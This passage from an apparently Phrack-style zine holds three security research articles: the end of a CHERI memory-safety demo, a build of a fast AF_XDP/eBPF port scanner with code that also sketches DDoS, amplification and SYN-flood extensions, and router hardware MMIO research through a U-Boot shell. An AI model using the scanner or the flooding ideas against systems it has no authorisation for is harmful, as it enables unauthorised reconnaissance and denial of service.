preventing legitimate capabilities from possibly being re-used at a later
time. Perhaps the reasoning is to do with memory latency again and the cost
of zeroing arbitrarily large memory regions during `free()`.

Let's see an example of the quarantining allocator in action:

#include <stdio.h>
#include <stdlib.h>

int main(void) {
    void* ptr = NULL;

    ptr = malloc(64);
    printf("ptr @ %#p\n", ptr);
    free(ptr);

    ptr = malloc(64);
    printf("ptr @ %#p\n", ptr);
    free(ptr);

    return 0;
}


On a non-CHERI system, we'd typically expect to see the same address
printed each time for `ptr`, despite the fact that we've free'd and
malloc'd in between the calls to `printf`. However, in our CheriBSD VM,
we see:

root@cheribsd-morello-purecap:~/vuln # ./heap1
ptr @ 0x40c0f000 [rwRW,0x40c0f000-0x40c0f040]
ptr @ 0x40c0f040 [rwRW,0x40c0f040-0x40c0f080]


Notice how the `ptr` capability changes - in fact the second capability is
always 64 bytes after the first. This is because, despite freeing `ptr`,
the memory it pointed to has been quarantined. The next time we try to
allocate something, we get the next free *non-quarantined* chunk which
happens to be immediately after the first chunk that we got.

How does any of this affect exploitation? Well, let's try to concoct a very
simple use-after-free example to see if and how CHERI complains to us:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {
    char* ptr1 = malloc(64);
    strcpy(ptr1, "CHERI1");
    free(ptr1);

    /* Leave this commented out for, we'll come back to it afterwards */
    //malloc_revoke();

    char* ptr2 = malloc(64);
    strcpy(ptr2, "CHERI2");
    free(ptr2);

    printf("ptr1 @ %#p => %s\n", ptr1, ptr1);
    printf("ptr2 @ %#p => %s\n", ptr2, ptr2);

    return 0;
}


On a non-CHERI system, the behaviour of the above program depends on the
allocator. On my host system, the addresses allocated for both `ptr1` and
`ptr2` are the same, but contain junk data by the time `printf` is called.
On a different system with a different allocator, the strings `CHERI1` and
`CHERI2` might still be present. However, in the CheriBSD VM, we see:

root@cheribsd-morello-purecap:~/vuln # ./heap2
ptr1 @ 0x40c0f000 [rwRW,0x40c0f000-0x40c0f040] => CHERI1
ptr2 @ 0x40c0f040 [rwRW,0x40c0f040-0x40c0f080] => CHERI2


In particular, notice how `ptr1` and `ptr2` DO NOT have the same value
despite `ptr2` being allocated after `ptr1` was freed. This is the
quarantining allocator at work again. Notice also that the `CHERI1` and
`CHERI2` strings are still in place. This tells us that the call to
`free()` *doesn't clear the tag bit from the pointers that are passed to
it*.

If we now uncomment the call to `malloc_revoke()` between the two
allocations, we get a very different result:

root@cheribsd-morello-purecap:~/vuln # ./heap2
In-address space security exception (core dumped)


Uh, oh - something went wrong. Let's take a look in GDB to see what
happened.

root@cheribsd-morello-purecap:~/vuln # gdb -q ./heap2 heap2.core
Reading symbols from ./heap2...
[New LWP 100064]
Core was generated by `./heap2'.
Program terminated with signal SIGPROT, CHERI protection violation.
Capability tag fault.
#0  strlen (str=0x40c0f000 [rwRW,0x40c0f000-0x40c0f040] (invalid) "CHERI2")
    at /home/user/cheri/cheribsd/lib/libc/string/strlen.c:143


So what did that `malloc_revoke()` function do? This is a function
provided by the CHERI SDK that forces a cleanup of the quarantine list in
the allocator. This means that the capability corresponding to `ptr1` has
its tag bit cleared. From the CHERI man pages [5], `malloc_revoke()`
"triggers a full flush of the quarantine and scan of memory to ensure that
all references to memory previously quarantined by free(3) or realloc(3)
are revoked upon successful return". Ultimately, we can see that `strlen()`
was called (presumably by `printf()` due to the `%s` format specifier) with
an invalid capability.

## Where next?

I hope you've enjoyed this figurative toe-dip into CHERI both as a concept, 
and also after getting our hands dirty with some solid examples.
Personally, I think the platform has some solid design ideas that will
certainly make classic exploitation techniques harder. I'm hesitant to say
that any of those existing techniques have been rendered obsolescent
because, as far as I'm aware, CHERI is yet to be battle tested as a
security mechanism on a target that's of significant interest to exploit
developers; like a flagship smartphone or a games console.

If you'd like to dive deeper into CHERI, then I recommend checking out the
Morello documentation more closely [2]. There's also the "CHERI Exercises"
repo on GitHub [6] by the CHERI team at Cambridge University which
highlights more scenarios where CHERI introduces new complications for
exploit writers. This article should give you a solid foundation to be able
to tackle those exercises.

Remember that CHERI doesn't stop at Morello with Aarch64! CHERI
specifications also exist for MIPS and RISC-V, with x86_64 in the works too.
In particular, there is the CherIoT (CHERI Internet-Of-Things) project [7]
which uses the RISC-V CHERI extension to power an IoT platform. This
project makes extensive use of the compartmentalisation feature of CHERI
that I briefly mentioned earlier in the article. This is a method of
process isolation using sealed capabilities without having to separate
processes into different memory spaces.

It's also worth taking a look at the output of `./cheribuild.py
--list-targets` - there are already build definitions for things like
Apache, Nginx, KDE Plasma, Wayland, FFmpeg, and even DOOM!

## Closing Thoughts

First of all, if you've made it this far - thank you! I hope you found this
read worth your time and that you learnt something - even if it was just to
scratch that itch to understand a little better what this CHERI thing is
all about. That's certainly why I chose to take a look at it. If CHERI
takes off in the consumer space in the future, I think bug hunters and
xdevs alike will enjoy the new challenged posed by it. And if it doesn't
take off, then it will still remain an interesting experiment that we can
continue to play with in VMs.

Obligatory shoutouts go to netspooky, dnoiz, hermit, gren, srsns, bane,
remy, computeruser, zeta, chill, buses, rqu, iximeow, ilya, kyo and The
Binary Golf Association (you should go play Binary Golf [8]).

## Links and References



|=-----------------------------------------------------------------------=|
|=-------------=[ 5 - High-Performance Network Scanning ]=---------------=|
|=-------------------------=[ With AF_XDP ]=-----------------------------=|
|=-----------------------------------------------------------------------=|
|=---------------------------=[ c3l3si4n ]=------------------------------=|
|=-----------------------------------------------------------------------=|


-- Table of contents

0 - Introduction
1 - The Slow Path: Traditional Scanning Methods
    1.0 - Per-Connection Syscall Overhead
    1.1 - Inefficient Packet Filtering with AF_PACKET
2 - Kernel Bypass and Fastpath Architectures
    2.0 - Full Kernel Bypass: DPDK
    2.1 - The Kernel Fastpath: XDP
    2.2 - XDP Internals: Actions and Modes
    2.3 - AF_XDP: A Zero-Copy Bridge to Userspace
3 - Building the Scanner
    3.0 - Core Design
    3.1 - The eBPF Filter Component
    3.2 - The Userspace Application
        3.2.0 - Setup and Initialization
        3.2.1 - The Packet Transmission Loop
        3.2.2 - The Packet Reception Loop
4 - Performance Analysis
    4.0 - A Note on Benchmarking
    4.1 - Head-to-Head: AF_XDP vs. masscan
5 - Extending the AF_XDP Framework
    5.0 - High-Speed HTTP/HTTPS Application Fuzzing and L7 DDoS
    5.1 - Stateless UDP Fuzzing and DDoS Amplification
    5.2 - High-Entropy SYN Flooding
6 - Caveats and Considerations
7 - Conclusion
8 - References
9 - Source Code

--[ 0 - Introduction

The network scanner has always been a fundamental tool in my arsenal. As
network interface speeds have increased, I found my tools were constrained
by the overhead of the operating system's kernel network stack. This has
become a significant bottleneck when doing internet-scale scans.

In this article, I describe the method I used to build a high-performance
port scanner using the Linux kernel's eBPF and AF_XDP subsystems. This
approach creates a kernel fastpath that bypasses the traditional network
stack, allowing my application to interact more directly with the network
driver for line-rate filtering and zero-copy data transfer.


--[ 1 - The Slow Path: Traditional Scanning Methods

---[ 1.0 - Per-Connection Syscall Overhead

My work began by analyzing the conventional port scanning method, which
uses the connect() syscall. For each port, the application creates a socket,
initiates a TCP handshake, and waits for the kernel to report the outcome.
Every socket() and connect() call is a context switch into the kernel,
consuming CPU cycles and introducing significant latency, making it
impractical for my purposes.


---[ 1.1 - Inefficient Packet Filtering with AF_PACKET

I then examined raw sockets (AF_PACKET), which allow a userspace
application to receive raw link-layer frames, bypassing the kernel's
high-level network stack. While this is an improvement for SYN scanning,
it does not provide the performance of a true kernel bypass. Packets are
still delivered via the standard kernel data path, which involves overhead
from context switches and memory copies for every packet received by the
interface. This inherent slowness compared to a direct kernel bypass was
unacceptable for my goals.


--[ 2 - Kernel Bypass and Fastpath Architectures

---[ 2.0 - Full Kernel Bypass: DPDK

To achieve maximum performance, some frameworks like the Data Plane
Development Kit (DPDK) implement a full kernel bypass. They use custom
Poll-Mode Drivers (PMDs) that unbind a network interface from the kernel's
control, giving a userspace application exclusive access. While this is
very fast, it comes with drawbacks: it requires custom drivers, is invasive
to the system, and often requires pinning a CPU core at 100% utilization
for polling.


---[ 2.1 - The Kernel Fastpath: XDP

It is important to clarify that AF_XDP is not a kernel bypass in the same
vein as DPDK. It is a highly efficient kernel fastpath that works in
cooperation with existing kernel drivers. My XDP program is an eBPF program
attached to a low-level hook in the network driver, triggered for every
incoming packet at the earliest possible point.


---[ 2.2 - XDP Internals: Actions and Modes

Once my eBPF program is running at the XDP hook, it can inspect the raw
packet data and return a verdict that determines the packet's fate. The
primary actions are XDP_PASS, XDP_DROP, XDP_TX, and XDP_REDIRECT. The
XDP_REDIRECT action is what allows my program to forward a packet to an
AF_XDP socket in userspace.

You can load XDP programs in three modes, which affects performance:
- Native XDP: The program is loaded directly by a supported network card
  driver, providing the highest performance.
- Offloaded XDP: The program is offloaded to and executed directly on the
  NIC hardware, requiring specific SmartNICs.
- Generic XDP: The program is hooked later in the kernel's network path,
  after an sk_buff has been allocated. This mode serves as a fallback for
  testing or for use on unsupported hardware.


---[ 2.3 - AF_XDP: A Zero-Copy Bridge to Userspace

AF_XDP is the kernel feature I used to create a high-performance data path
between my XDP program and my userspace application. This is achieved
through a shared memory region called a UMEM, which I allocate in userspace
and register with the kernel. This UMEM is where all my packet data lives.
The communication is orchestrated by a set of four single-producer, single-
consumer rings:

- RX Ring: The kernel places descriptors here for incoming packets that my
  XDP program has redirected.
- TX Ring: I place descriptors here for packets I want to send. The kernel
  picks them up and transmits them.
- FILL Ring: I place descriptors for empty UMEM frames on this ring to give
  the buffers to the kernel for receiving new packets.
- COMPLETION Ring: After the kernel has sent a packet from my TX ring, it
  places the descriptor on this ring to signal that the UMEM frame can be
  reused.

This architecture allows me to shuttle packets back and forth with the NIC
driver while minimizing memory copies and context switches.


--[ 3 - Building the Scanner

---[ 3.0 - Core Design

My demonstration scanner is composed of two primary components: an eBPF+XDP
filter in C and a userspace packet sender in Go. The core design separates
the logic for efficiency. My eBPF filter is loaded onto the NIC to inspect
incoming TCP packets and redirect only the replies relevant to the scanner.
My Go application then manages the AF_XDP socket, populates the FILL ring,
sends SYN packets via the TX ring, and processes the replies from the RX
ring. This division of labor places the performance-critical filtering in
the kernel, while I handle the more complex state and I/O logic in
userspace.

---[ 3.1 - The eBPF Filter Component

My eBPF code is designed for efficiency and simplicity.

// file: bpf/xdp_filter.c
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <linux/tcp.h>

// This MUST match the -srcport flag in my Go program.
#define FILTER_PORT 54321

// Map to hold the file descriptor of my AF_XDP socket.
struct {
        __uint(type, BPF_MAP_TYPE_XSKMAP);
        __uint(key_size, sizeof(__u32));
        __uint(value_size, sizeof(__u32));
        __uint(max_entries, 1);
} xsks_map SEC(".maps");

SEC("xdp")
int xdp_port_filter(struct xdp_md *ctx) {
    void *data_end = (void *)(long)ctx->data_end;
    void *data = (void *)(long)ctx->data;
    struct iphdr *ip = data + sizeof(struct ethhdr);
    struct tcphdr *tcp;

    if ((void*)ip + sizeof(*ip) > data_end)
        return XDP_PASS;

    if (ip->protocol != IPPROTO_TCP)
        return XDP_PASS;

    tcp = (void *)ip + ip->ihl * 4;
    if ((void *)tcp + sizeof(*tcp) > data_end)
        return XDP_PASS;

    if (tcp->dest == bpf_htons(FILTER_PORT))
        return bpf_redirect_map(&xsks_map, 0, 0);

    return XDP_PASS;
}



---[ 3.2 - The Userspace Application

The PoC Go application orchestrates the entire scanning process.

----[ 3.2.0 - Setup and Initialization

Before any packets fly, a sequence of setup steps must be performed.
First, I parse the arguments for the interface, targets, and ports. Then,
I load my compiled xdp_filter.o program and attach it to the specified
interface. The core setup involves creating the AF_XDP socket, then
allocating and registering the UMEM via the XDP_UMEM_REG setsockopt call.
Following that, I set the sizes of the four rings and mmap them into my
application's address space. With the socket ready, I register its file
descriptor into the eBPF map so the kernel knows where to redirect packets.
Finally, since my tool operates at Layer 2, I must manually resolve the
gateway's MAC address via ARP.


----[ 3.2.1 - The Packet Transmission Loop

Instead of sending packets one by one, we can send packets in large batches
to amortize the cost of syscalls.

// file: cmd/portscanner/main.go (conceptual)
// A template packet is pre-crafted to avoid building from scratch every
time
packer, _ := newSynPacker(srcMAC, gatewayMAC, srcIP, srcPort)

// Ensure COMPLETION ring is checked to reclaim UMEM frames for reuse
check_completion_ring_and_refill_umem();

for outstandingCount > 0 {
    numFree := xsk.NumFreeTxSlots()
    if numFree > 0 {
        descs := xsk.GetDescs(min(numFree, BATCH_SIZE), false)
        for i := range descs {
            target := getNextTarget()
            frame := xsk.GetFrame(descs[i]) // Pointer to shared memory
            packer.pack(frame, target.ip, target.port, randomSeq())
            descs[i].Len = pktLen
        }
        xsk.Transmit(descs)
    }
}



----[ 3.2.2 - The Packet Reception Loop

My receive loop, running in a dedicated goroutine, can be simple because
the eBPF program has already handled the filtering.

// file: cmd/portscanner/main.go (conceptual)
// Pre-populate the FILL ring with available UMEM frames
populate_fill_ring();

for {
    numRx, _, err := xsk.Poll(10) // 10ms timeout
    if numRx > 0 {
        rxDescs := xsk.Receive(rxDescs)
        for _, desc := range rxDescs {
            frame := xsk.GetFrame(desc)
            ip, port, status := processPacket(frame)
            if status == "open" || status == "closed" {
                updateStatus(ip, port, status)
            }
        }
        // Return the now-empty frame descriptors to the kernel's FILL ring
        xsk.Fill(rxDescs)
    }
}


--[ 4 - Performance Analysis

---[ 4.0 - A Note on Benchmarking

To validate this architecture, a performance comparison is necessary. I
chose masscan as the benchmark, as it represents the gold standard for
high-speed, internet-scale scanning. It must be stated that masscan is a
mature, highly-tuned project. It has years of optimization in its custom
networking code and supports advanced kernel-bypass techniques such as
PF_RING with DNA drivers. This driver DMAs packets directly from user-mode
memory to the network driver with zero kernel involvement, allowing it to
transmit at the maximum rate the hardware allows. Therefore, the goal here
is not to "beat" masscan, but to determine if an AF_XDP-based tool, even as
a proof-of-concept, can be competitive and where its architectural
strengths lie.

The benchmark consists of two scenarios: a high-density scan against a
single host (45.33.32.156) on all 65,535 ports, and a wide-range scan
against a /9 network (8.3 million IPs) on a single port.


---[ 4.1 - Head-to-Head: AF_XDP vs. masscan

A critical factor in masscan's design is a built-in 10-second delay at the
end of each scan to receive late-arriving packets.

--------------------------------------------------------------------------
    rate:  0.00-kpps, 100.00% done, waiting 10-secs, found=3 ~
--------------------------------------------------------------------------

When this delay is factored out to compare raw transmission times, the
results are revealing. For the wide-range /9 scan, masscan clocked in at
69.2 seconds total, meaning its active scanning time was only ~59.2
seconds.

--------------------------------------------------------------------------
    real        1m9.174s
--------------------------------------------------------------------------

My XDP scanner completed the same task in 68.3 seconds. In this scenario,
where the bottleneck is spread across millions of IPs, masscan's years of
optimization give it a clear edge.

However, the high-density scan against a single host tells a different
story. Here, masscan's active scanning time was ~2 seconds (12 seconds of
total time minus the 10-second delay).

--------------------------------------------------------------------------
    real        0m12.163s
--------------------------------------------------------------------------

My AF_XDP scanner finished in just ~1.3 seconds. ~ The victory for the
AF_XDP scanner here was not just in speed, but also in accuracy. My scanner
consistently identified all four open ports on the target in every run:

--------------------------------------------------------------------------
    OPEN: 45.33.32.156:22
    OPEN: 45.33.32.156:9929
    OPEN: 45.33.32.156:80
    OPEN: 45.33.32.156:31337
--------------------------------------------------------------------------

In contrast, masscan's high rate caused it to miss ports, finding a
different number of open ports on different runs:

--------------------------------------------------------------------------
    1st scan: 0.00-kpps, 100.00% done, waiting 0-secs, found=3
    2nd scan:  0.00-kpps, 100.00% done, waiting 0-secs, found=2
--------------------------------------------------------------------------

This outcome directly validates the AF_XDP architecture. The performance
gains are a result of several combined optimizations. The kernel-level eBPF
filter drops unwanted traffic at the earliest possible point. The zero-copy
UMEM and batched ring operations nearly eliminate syscall overhead. This is
why the PoC excels in the high-density test: the per-packet overhead is so
low that it can saturate a single target more effectively and reliably than
a tool tuned for internet-wide distribution.

While the XDP scanner is just a proof-of-concept, it shows that with
further development, this architecture holds potential.

--[ 5 - Extending the AF_XDP Framework

---[ 5.0 - High-Speed HTTP/HTTPS Application Fuzzing and L7 DDoS

The architecture developed for this scanner serves as a foundation for
other high-performance network applications, particularly for security
research and testing. The framework can be extended to handle stateful
protocols by implementing a TCP stack in userspace. This involves managing
sequence numbers, ACKs, windowing, and state transitions. This userspace
TCP stack then serves as a transport layer for higher-level protocols.

To interact with HTTPS services, a TLS library (e.g., OpenSSL) can be
integrated by redirecting its I/O from kernel sockets to the userspace TCP
stack. In OpenSSL, this can be done using a custom BIO (Basic I/O
abstraction). The BIO_read and BIO_write callbacks would then interface
with the userspace TCP stack's send/receive buffers, not with read() or
write() syscalls.

With such a setup, you could use AF_XDP to create a high-speed
application-layer fuzzer. For content discovery, one could pipeline a
massive number of fuzzed HTTP requests over multiple, persistent HTTPS
connections, achieving a request-per-second rate far higher than
conventional tools like ffuf or gobuster. This same capability can be used
for Layer 7 DDoS attacks, exhausting resources by flooding it with the
highest RPS you can achieve.


---[ 5.1 - Stateless UDP Fuzzing and DDoS Amplification

UDP protocols are an even simpler target due to their stateless nature.
For these, the packet crafting engine can be adapted to fuzz any UDP
service or execute DDoS reflection/amplification attacks by spoofing the
source IP and generating requests at a massive rate. There's no complex
state to maintain, just packet generation.

This lays the foundation that creating AF_XDP programs to interact with
UDP protocols is architecturally easier to implement. Several tools already
use this concept to bruteforce DNS records in a faster way for example (e.g
sanicdns, pugdns).


--[ 6 - Caveats and Considerations

This approach has several requirements and trade-offs. Root privileges are
mandatory to load eBPF programs and create AF_XDP sockets so you wouldn't
be able to use it on a unprivileged session. The implementation complexity
is high, as your application is now responsible for everything from ARP
resolution to MAC address management. Performance is also heavily reliant
on having a modern kernel and a NIC driver that supports native AF_XDP and
since that's a relatively recent feature on the kernel, you won't be able
to run it on any system.


--[ 7 - Conclusion

By combining the filtering capabilities of eBPF at the XDP hook with the
zero-copy architecture of AF_XDP, it is possible to build network
applications that far exceed the performance of traditional socket-based
programs. My port scanner serves as a practical example of this paradigm.
Unlike full bypass frameworks, AF_XDP provides a more universal and less
invasive path to high-performance packet processing by integrating
cooperatively with the mainline Linux kernel. The same principles that
enable my rapid network scanning also provide a foundation for security
research and attack tools.


--[ 8 - References


--[ 9 - Source Code

xdp.tar.gz



|=-----------------------------------------------------------------------=|
|=---------------------=[ 6 - MMIO in the Middle ]=----------------------=|
|=-----------------------------------------------------------------------=|
|=----------------------------=[ b1ack0wl ]=-----------------------------=|
|=-----------------------------------------------------------------------=|


--[ Table of Contents

  0 - Introduction 
  1 - What sparked this research 
  2 - Looking into Das U-Boot 
  3 - Initial Testing 
  4 - Using Qemu to record MMIO transactions 
  5 - Discoveries 
  6 - Failed idea(s) 
  7 - Give this a try yourself!


--[ 0 - Introduction

System on Chips (SoCs) are very common in embedded devices, ranging from 
cell phones to cheap smart devices. These chips contain many subcomponents 
within them such as flash memory, network chips, modems, ...etc. These 
subcomponents are interacted with via Memory Mapped Input Output regions
(MMIO) which is a fancy way of saying "Memory Address 0x00000004 is mapped
to register 'X' for component 'Y'.

The target for this article is the TP-Link WR940N wireless router. This 
device has a fairly old processor in it, the "TP9343", which is actually
a Qualcomm Atheros QCA956x SoC. Even though the target device in this 
article is outdated, the technique I am about to describe can be applied 
to different types of embedded devices where the bootloader can easily be 
changed, or has the ability to read and write to physical memory.


--[ 1 - What sparked this research

A while back, @hyprdude and I were doing some reconnaissance on the router. 
hyperdude found that the GPL tarball [1] published by TP-Link was fully 
loaded, and included the modified Linux kernel and Das U-Boot sources used 
on the device. 

This discovery sparked an idea of creating a custom Qemu board for this 
particular chipset, which will help us understand the initial MMIO regions 
that the bootloader writes and reads to when it's first powered on (e.g. 
making an LED blink different colors.) A custom board will also give us 
the ability to debug the kernel and kernel modules, because the pins for 
E-JTAG were not working. 

After looking at the bootloader's source code, it was obvious why the pins 
were not working. The following code is executed upon startup, which 
disables the E-JTAG ports on the device via multiplexing.

[board956x.c] 
#define GPIO_FUNC  0x1804006c

/* set non-JTag */ 
li t0, GPIO_FUNC 
lw t1, 0(t0) li t2,  (1<<1) /* we useGPIO14/GPIO15, so disable JTAG*/ 
or t1, t1, t2 
sw t1, 0(t0)


By looking at the code, we can note that the MMIO address 0x1804006c is the
`GPIO_FUNC` register. This register may be responsible for GPIO input 
multiplexing, but without a datasheet it's all just guesses from prior 
experiences.

Luckily, there was a datasheet posted on a Github repo [2] for the QCA9563 
chip, which specifies that `bit 1` at address `0x1804006c` is for disabling 
JTAG. Since we have the source code that actually compiles, we can simply 
modify Das U-Boot and enable JTAG. But, the goal is to achieve kernel 
debugging without touching the hardware, even though it should be possible 
to access E-JTAG before the above ASM statements are executed.


--[ 2 - Looking into Das U-Boot

While looking for more hints about the MMIO regions, I decided to analyze
the modified source code for the bootloader within the GPL tarball. 

If the following keywords are defined:

- `CONFIG_AUTOBOOT_KEYED`
- `CONFIG_BOOTDELAY`
- `CONFIG_AUTOBOOT_STOP_STR` or `CONFIG_AUTOBOOT_STOP_STR2`

Then the string defined in `CONFIG_AUTOBOOT_STOP_STR*` needs to be sent
to the console before the countdown defined in CONFIG_BOOTDELAY reaches
zero. (this reminds me of the game NFL Blitz where you can press in a code
before the match begins)

For the WR940Nv6, the string `tpl` is defined and needs to be sent within 
1 second after the `CONFIG_AUTOBOOT_PROMPT` is displayed. Doing this 
manually has a low success rate, but using python to spam the string `tpl`
over and over again via a serial adapter has a very high success rate! 
This drops us into a Das U-boot shell which gives us read and write access 
to physical memory via the `md` and `mw` commands. Awesome!

The code for the `md` and `mw` commands can be found in 
`/ap151/boot/u-boot/common/cmd_mem.c` within the GPL tarball for the 
WR940Nv6.


--[ 3 - Initial Testing

To make sure that the newly discovered Das U-Boot shell can actually read
and write to physical memory I decided to write to address `0x18040008`
which corresponds to the `GPIO_OUT` register. This address is marked as 
"read-only" in the datasheet, so I looked at the Das U-Boot code to find 
any hints to help me confirm this is true. Within the `led.S` file the 
address `0x18040008` is labeled as `GPIO_OUT` which lines up with the 
datasheet, but then they write the value `0xc000` to it with a comment
that says that the LED will turn orange. 

The value `0xc000` has bits 14 and 15 set, which could mean that GPIO 
output ports 14 and 15 are "ON" which turns on the LED, but why is it 
orange? Well, the LED is a three pin multi-colored LED with two different 
colors, red (but it looks orange irl) and blue. By providing power to one 
of the pins, we can enable the red (orange) LED. Since this code is made 
to support different versions of the WR940N (which all have different LED 
configurations) they set both GPIO 14 and 15 to ON, but only one pin is 
needed to make the red LED turn on, so the red pin is connected to either 
GPIO pin 14 or 15. Through trial and error it was found that GPIO pin 14 
on the WR940Nv6 is the red LED and pin 19 is the blue LED! 

There's a statement within `led.S` that says to turn all of the "WAN" LEDs 
blue via `~((1<<3) | (1<<14) | (1<<4) | (1<<5) | (1<<6) | (1<<7))`, and 
through trial and error it was discovered that GPIO pin 19 turns on the 
blue LED and setting pins 14 and 19 will make the LED turn purple! Even 
though this test seems a bit silly, it verifies that the Das U-boot shell 
can write to MMIO regions and they actually work! The following diagram 
shows how the test was conducted:


   ||====[UART (Das U-Boot Shell)]
   ||                                  \    |    /
   vv 
+------------+                         /---------\
|            |---------GPIO 14------->|           |
|            |                         \   LED   /
|   QCA956x  |                          |   |   |
|            |---------GPIO 19------------->|   |
|            |-----------GND------------------->|
+------------+                          |   |   |


After this test, I created a python script that connects to a UART serial
adapter via the `serial` module and accepts commands to read or write 4 
bytes of data to memory via a TCP socket. Using this approach is expected 
to be slow, but if this works then I can integrate all of it in C via 
libftdi or libusb and eliminate the need of using a socket and python. 
Make it work first, then make it fast later.


Code: NOTE: The code below is only part of the final MITM python script.

def read_from_phy_memory(ser, address):
  print(f'[*] Reading from Address: 0x{address:08X}...') 
  ser.write(bytes(f"md 0x{address:08X}1\n","UTF-8")) 
  out = get_response(ser) offset = out.rfind(bytes(f'{address:08x}: 
  ',"UTF-8")) 
  value = int(b'0x' +  out[offset + len(bytes(f'{address:08x}: ',
  "UTF-8")):offset + len(bytes(f'{address:08x}:',"UTF-8")) + 8], 16) 
  logging.debug(f"READ:  0x{address:08X}:0x{value:08X}") 
  return value

def write_to_phy_memory(ser, address, value):
  print(f'[*] Writing to Address: 0x{address:08X} with value \
  0x{value:08X}...')
  logging.debug(f"WRITE: 0x{address:08X}: 0x{value:08X}")
  ser.write(bytes(f"mw 0x{address:04X} 0x{value:04X}\n","UTF-8"))

def listen_and_respond(ser, port):
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  try:
    s.bind(("0.0.0.0", port))
  except socket.error as msg:
    print('[-] Bind failed. Error Code : ' + str(msg[0]) + \
    ' Message ' + msg[1])
    return False
  s.listen(1)
  print (f'[*] Socket now listening on port {port}')
  while True:
    conn, addr = s.accept()
    msg = conn.recv(1024)
    while len(msg) > 0:
      if msg == b'exit\n':
        conn.send(bytes('[*] Byeeeeee\n', "UTF-8"))
        conn.close()
        break
      if msg == b'shutdown\n':
        conn.send(bytes('[*] The server is going down down\n', 
        "UTF-8"))
        conn.close()
        s.shutdown(socket.SHUT_WR)
        s.close()
        return
      elif msg[0] == ord('r'):
        # Read Bytes
        addr = int(msg[1:].strip(b'\n'), 16)
        out = read_from_phy_memory(ser, addr)
        conn.send(bytes(hex(out), "UTF-8"))
      elif msg[0] == ord('w'):
        # Write Bytes
        address = msg[1:].split(b" ")[0]
        value = msg[1:].split(b" ")[1].strip(b'\n')
        write_to_phy_memory(ser, int(address, 16), int(value, 16))
        conn.send(b'1')
      msg = conn.recv(1024)


--[ 4 - Using Qemu to record MMIO transactions

To help speed up development, I copied the `mipssim.c` board within the
`qemu/hw/mips` directory and used it as a skeleton. From there I reviewed
the documentation for Qemu to learn the memory APIs. All that was needed 
to make a MMIO region is to first call `memory_region_init_io()` with the
MemoryRegion *pointer (comes from g_new(MemoryRegion,1)), a struct that
contains the `.read.`, `.write.`, callbacks populated (struct
MemoryRegionOps), the name of the region for Qemu to use (e.g. "DDR"), and
then the size of the region. An Object can be supplied to the second
argument which is passed to the callbacks, but that isn't needed at this
stage. However, it'll be needed when implementing the logic for the virtual
component. Lastly a call to `memory_region_add_subregion()` needs to be
called for the subregion to be applied to the main memory space (return
value of get_system_memory()). 

The following code Qemu snippet demonstrates registering the subregion 
for the GPIO registers:

[...]
/* MMIO Callbacks for GPIO */
// READ
static uint64_t gpio_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
  return 0; // return 0 for all reads in the GPIO region
}
// WRITE
static void gpio_mmio_write(void *opaque, hwaddr addr,
                               uint64_t val, unsigned size)
{
  // The addr argument is an offset within the MMIO region
  // 0x44 == 0x18040044
  if (addr == 0x44){  // Skip this register since this breaks MITM MMIO
      return;
  }
  return;
}

// Struct for Callbacks + Endianness
static const MemoryRegionOps gpio_mmio_ops = {
    .read  = gpio_mmio_read,
    .write = gpio_mmio_write,
    .endianness = DEVICE_BIG_ENDIAN
};

// Get physical memory
MemoryRegion *address_space_mem = get_system_memory();
// Init GPIO region
memory_region_init_io(gpio_mmio, NULL, &gpio_mmio_ops, NULL, "GPIO_MMIO",
0x70);
// Add subregion to physical memory
memory_region_add_subregion(address_space_mem, 0x18040000LL, gpio_mmio);
// Reads and writes to GPIO will trigger the callbacks during runtime.
[...]


With the regions mapped with callbacks, the next step is to connect Qemu to
the MITM script. This can be accomplished when the virtual board is being
initialized by creating a socket, saving the socket fd, connecting to the
python listener, and return. Then, within the callbacks, the socket fd is
used to request reads and writes to physical memory from the python
listener.


This is how it's all connected: 
+----------+       +----------+        +----------+         
|   Qemu   |<-TCP->|  Python  |<-UART->|  Router  | 
|          |       |          |        |  U-Boot  | 
+----------+       +----------+        +----------+


Note: If a datasheet could not be found for this SoC in this paper then I
would register one large MMIO callback region starting at an address that
crashes when an running from a found entry point. (e.g. Address: 0x18000000
Size: 0x18000000 [0x18000000-0x30000000])

--[ 5 - Discoveries

The initial discovery that was already mentioned is that the datasheet and
source code don't line up 100%, it's more like 90%. Besides that, it was
found that the DDR region (0x18000000) is reported as 0x128 bytes in size,
but there's an additional register (DDR3_CONFIG) that lives at `0x1800015C`,
so there's either undocumented registers between `0x128-0x15c` or that
particular memory space is unused.

Another discovery was the region that wasn't fully documented within the
datasheet, but I've labeled it as `GMAC1` which lives at `0x1A000000` with
size `0x2E8` since the values written are very close to the values written
to the `GMAC0` region (0x19000000).

The virtual device actually gets pretty far within the boot process, but
fails during the initialization of the WiFi driver. Since we're just
capturing MMIO transactions, the thing that's missing are the interrupts 
that need to be used when certain conditions happen for each subcomponent. 
(e.g. Raise an interrupt for when a certain register for a clock reaches 
zero during calibration.)

The GPIO address `0x18040044` is labeled `UART0_SIN Multiplexing` and the
usage is to set which GPIO pins are used for UART0. During the boot process
this register is written to and breaks the UART connection that used to
interact with Das U-Boot. Adding a statement to skip offset `0x44` for this
region is needed to continue booting from Das U-Boot and into Linux
(virtually).

This approach allows us to utilize a component of the SoC in real life while
being able to emulate all of the other subcomponents that we're not
interested in. (e.g. utilize the device's Ethernet Ports + Controller, but
emulate the rest of the other subcomponents)

--[ 6 - Failed ideas

My first idea was to use `/dev/mem` to read and write to physical memory, 
but attempting to write to physical memory would result in a segfault. 
Reading from these regions was fine, but writing as a no-go. Plus, the OS 
is fully loaded with running drivers, so these regions are constantly
being used. Attempting to read and write could cause unpredictable system 
instability, so leveraging the bootloader seemed like a better idea. No 
drivers, No OS, just GPIO pins :)

I then attempted to bit bang GPIO pins for E-JTAG with an Arduino nano, but
this resulted in nothing being found :(


--[ 7 - Give this a try yourself!

* Turn off the WR940Nv6
* Connect a serial adapter to the UART pins
  * Note: There are two jumpers that need to be soldered to complete the
    circuit for RX/TX
* Run the script below to drop the WR940Nv6 into the Das U-Boot shell
* Turn on the Router via the button on the back of the router
  * Note: If the script doesn't detect a shell within a few seconds then
    reboot the router and it should work
* Connect to port TCP port 1337 once the script detects a Das U-boot shell
